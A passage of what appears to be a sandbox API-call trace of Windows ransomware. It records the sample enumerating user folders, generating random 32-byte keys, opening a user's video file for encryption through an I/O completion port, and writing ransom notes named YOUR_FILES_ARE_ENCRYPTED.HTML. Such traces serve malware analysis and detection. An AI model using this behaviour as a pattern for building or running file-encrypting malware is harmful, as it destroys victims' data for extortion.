(pszPath="TWmxUNch5jv08E.swf") returned=".swf" [0168.972] lstrlenW (lpString=".swf") returned 4 [0168.972] PathFindExtensionW (pszPath="TWmxUNch5jv08E.swf") returned=".swf" [0168.972] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dea6380, ftCreationTime.dwHighDateTime=0x1d7dc2d, ftLastAccessTime.dwLowDateTime=0x51cdd400, ftLastAccessTime.dwHighDateTime=0x1d7dd1e, ftLastWriteTime.dwLowDateTime=0x51cdd400, ftLastWriteTime.dwHighDateTime=0x1d7dd1e, nFileSizeHigh=0x0, nFileSizeLow=0x128b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="X4ny7HQWCG093Ih87.flv", cAlternateFileName="X4NY7H~1.FLV")) returned 1 [0168.972] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv") returned 52 [0168.972] lstrcmpW (lpString1="X4ny7HQWCG093Ih87.flv", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0168.972] PathFindExtensionW (pszPath="X4ny7HQWCG093Ih87.flv") returned=".flv" [0168.972] lstrlenW (lpString=".flv") returned 4 [0168.972] PathFindExtensionW (pszPath="X4ny7HQWCG093Ih87.flv") returned=".flv" [0168.972] SystemFunction036 (in: RandomBuffer=0x4ebde04, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebde04) returned 1 [0168.972] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv" (normalized: "c:\\users\\5alr3u30d3\\videos\\x4ny7hqwcg093ih87.flv"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5d8 [0168.973] GetFileSizeEx (in: hFile=0x5d8, lpFileSize=0x4ebde28 | out: lpFileSize=0x4ebde28*=4747) returned 1 [0168.973] GetProcessHeap () returned 0x270000 [0168.973] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x78e9d78 [0168.986] wsprintfW (in: param_1=0x4ebdd42, param_2="%02X" | out: param_1="0C") 
returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd46, param_2="%02X" | out: param_1="50") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd4a, param_2="%02X" | out: param_1="DB") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd4e, param_2="%02X" | out: param_1="CC") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd52, param_2="%02X" | out: param_1="75") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd56, param_2="%02X" | out: param_1="9E") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd5a, param_2="%02X" | out: param_1="CD") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd5e, param_2="%02X" | out: param_1="3D") returned 2 [0168.986] wsprintfW (in: param_1=0x4ebdd62, param_2="%02X" | out: param_1="2C") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd66, param_2="%02X" | out: param_1="6A") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd6a, param_2="%02X" | out: param_1="46") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd6e, param_2="%02X" | out: param_1="20") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd72, param_2="%02X" | out: param_1="0D") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd76, param_2="%02X" | out: param_1="5B") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd7a, param_2="%02X" | out: param_1="96") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd7e, param_2="%02X" | out: param_1="84") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd82, param_2="%02X" | out: param_1="04") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd86, param_2="%02X" | out: param_1="8D") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd8a, param_2="%02X" | out: param_1="42") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd8e, param_2="%02X" | out: param_1="92") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd92, param_2="%02X" | out: param_1="26") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd96, param_2="%02X" | out: param_1="AA") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd9a, 
param_2="%02X" | out: param_1="B2") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdd9e, param_2="%02X" | out: param_1="07") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdda2, param_2="%02X" | out: param_1="C3") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebdda6, param_2="%02X" | out: param_1="7E") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddaa, param_2="%02X" | out: param_1="A6") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddae, param_2="%02X" | out: param_1="E5") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddb2, param_2="%02X" | out: param_1="2D") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddb6, param_2="%02X" | out: param_1="80") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddba, param_2="%02X" | out: param_1="36") returned 2 [0168.987] wsprintfW (in: param_1=0x4ebddbe, param_2="%02X" | out: param_1="6A") returned 2 [0168.988] lstrcpyW (in: lpString1=0x78f9e2c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\X4ny7HQWCG093Ih87.flv" [0168.988] CreateIoCompletionPort (FileHandle=0x5d8, ExistingCompletionPort=0x3a0, CompletionKey=0x78e9d78, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0168.988] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x78e9d78, lpOverlapped=0x78e9d78) returned 1 [0168.988] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dea6380, ftCreationTime.dwHighDateTime=0x1d7dc2d, ftLastAccessTime.dwLowDateTime=0x51cdd400, ftLastAccessTime.dwHighDateTime=0x1d7dd1e, ftLastWriteTime.dwLowDateTime=0x51cdd400, ftLastWriteTime.dwHighDateTime=0x1d7dd1e, nFileSizeHigh=0x0, nFileSizeLow=0x128b, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="X4ny7HQWCG093Ih87.flv", cAlternateFileName="X4NY7H~1.FLV")) returned 
0 [0168.988] FindClose (in: hFindFile=0x42f3140 | out: hFindFile=0x42f3140) returned 1 [0168.988] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 60 [0168.988] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\Videos\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\videos\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5a0 [0168.989] WriteFile (in: hFile=0x5a0, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe12c, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe12c*=0x3c00, lpOverlapped=0x0) returned 1 [0168.991] CloseHandle (hObject=0x5a0) returned 1 [0168.991] GetProcessHeap () returned 0x270000 [0168.992] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0168.992] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd236a430, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xaeba41e0, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xaeba41e0, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Videos", cAlternateFileName="")) returned 0 [0168.992] FindClose (in: hFindFile=0x42f3100 | out: hFindFile=0x42f3100) returned 1 [0168.992] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 53 [0168.992] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\your_files_are_encrypted.html"), 
dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a4 [0168.993] WriteFile (in: hFile=0x4a4, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebe438, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebe438*=0x3c00, lpOverlapped=0x0) returned 1 [0168.995] CloseHandle (hObject=0x4a4) returned 1 [0168.995] GetProcessHeap () returned 0x270000 [0168.996] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0168.996] FindNextFileW (in: hFindFile=0x42f30c0, lpFindFileData=0x4ebe478 | out: lpFindFileData=0x4ebe478*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x1765f29d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x1765f29d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1765f29d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0168.996] wnsprintfW (in: pszDest=0x431df40, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users") returned 22 [0168.996] GetProcessHeap () returned 0x270000 [0168.996] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74081a0 [0168.996] lstrcpyW (in: lpString1=0x74081a0, lpString2="\\\\?\\C:\\Users\\All Users" | out: lpString1="\\\\?\\C:\\Users\\All Users") returned="\\\\?\\C:\\Users\\All Users" [0168.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\*") returned="\\\\?\\C:\\Users\\All Users\\*" [0168.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\*", lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, 
ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3100 [0168.997] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcd039ec0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcd039ec0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0168.997] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176f781e, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176f781e, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176f781e, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0168.997] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Application Data") returned 39 [0168.997] GetProcessHeap () returned 0x270000 [0168.997] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0168.997] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Application Data" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data") returned="\\\\?\\C:\\Users\\All Users\\Application Data" [0168.997] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Application Data", lpString2="\\*" | out: 
lpString1="\\\\?\\C:\\Users\\All Users\\Application Data\\*") returned="\\\\?\\C:\\Users\\All Users\\Application Data\\*" [0168.997] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Application Data\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0168.997] GetProcessHeap () returned 0x270000 [0168.998] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0168.998] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Desktop", cAlternateFileName="")) returned 1 [0168.998] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Desktop") returned 30 [0168.998] GetProcessHeap () returned 0x270000 [0168.998] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0168.998] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop") returned="\\\\?\\C:\\Users\\All Users\\Desktop" [0168.998] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Desktop\\*") 
returned="\\\\?\\C:\\Users\\All Users\\Desktop\\*" [0168.998] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Desktop\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0168.998] GetProcessHeap () returned 0x270000 [0168.999] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0168.999] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0168.999] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Documents") returned 32 [0168.999] GetProcessHeap () returned 0x270000 [0168.999] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0168.999] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Documents" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents") returned="\\\\?\\C:\\Users\\All Users\\Documents" [0168.999] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Documents", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Documents\\*") returned="\\\\?\\C:\\Users\\All Users\\Documents\\*" [0168.999] FindFirstFileW 
(in: lpFileName="\\\\?\\C:\\Users\\All Users\\Documents\\*", lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0168.999] GetProcessHeap () returned 0x270000 [0169.000] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0169.000] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x176ab55d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x176ab55d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x176ab55d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0169.000] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Favorites") returned 32 [0169.000] GetProcessHeap () returned 0x270000 [0169.000] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0169.000] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites") returned="\\\\?\\C:\\Users\\All Users\\Favorites" [0169.000] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Favorites\\*") returned="\\\\?\\C:\\Users\\All Users\\Favorites\\*" [0169.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Favorites\\*", 
lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x74081a0, ftCreationTime.dwLowDateTime=0x430df38, ftCreationTime.dwHighDateTime=0x75aba344, ftLastAccessTime.dwLowDateTime=0x18, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x4ebdec0, ftLastWriteTime.dwHighDateTime=0x40, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="", cAlternateFileName="膠݀")) returned 0xffffffff [0169.001] GetProcessHeap () returned 0x270000 [0169.001] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74ea160 | out: hHeap=0x270000) returned 1 [0169.001] FindNextFileW (in: hFindFile=0x42f3100, lpFindFileData=0x4ebe16c | out: lpFindFileData=0x4ebe16c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0169.001] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft") returned 32 [0169.001] GetProcessHeap () returned 0x270000 [0169.001] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74ea160 [0169.001] lstrcpyW (in: lpString1=0x74ea160, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft") returned="\\\\?\\C:\\Users\\All Users\\Microsoft" [0169.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\*" [0169.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\*", lpFindFileData=0x4ebde60 | out: 
lpFindFileData=0x4ebde60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3140 [0169.002] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0xf9e4b61b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcc217c20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcc217c20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Assistance", cAlternateFileName="ASSIST~1")) returned 1 [0169.002] wnsprintfW (in: pszDest=0x74ea160, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned 43 [0169.002] GetProcessHeap () returned 0x270000 [0169.002] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.002] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance") returned="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Assistance" [0169.002] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*" [0169.002] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\*", lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3180 [0169.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.002] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Client", cAlternateFileName="")) returned 1 [0169.002] wnsprintfW (in: pszDest=0x74fa168, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Assistance\\Client") returned 50 [0169.003] GetProcessHeap () returned 0x270000 [0169.003] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x749a470 [0169.003] lstrcpyW (in: lpString1=0x749a470, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client" [0169.003] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*" [0169.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Assistance\\Client\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x85f7a2c7, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xcacd1780, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcacd1780, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, 